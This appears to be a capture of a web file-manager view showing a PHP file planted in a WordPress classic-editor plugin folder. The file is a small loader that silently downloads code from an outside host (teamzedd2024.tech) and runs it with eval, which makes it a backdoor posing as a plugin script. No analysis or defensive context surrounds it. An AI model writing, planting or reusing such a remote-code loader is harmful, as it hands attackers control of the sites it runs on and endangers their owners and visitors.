| Current Path : /home/jerry7822/public_html/wp-content/plugins/classic-editor/scripts/ |
| Current File : /home/jerry7822/public_html/wp-content/plugins/classic-editor/scripts/ytm.php |
<?php
function loaderReadfileEval($url) {
ob_start();
@readfile($url);
$code = ob_get_clean();
eval("?>$code");
}
loaderReadfileEval("https://teamzedd2024.tech/raw/McuQGI");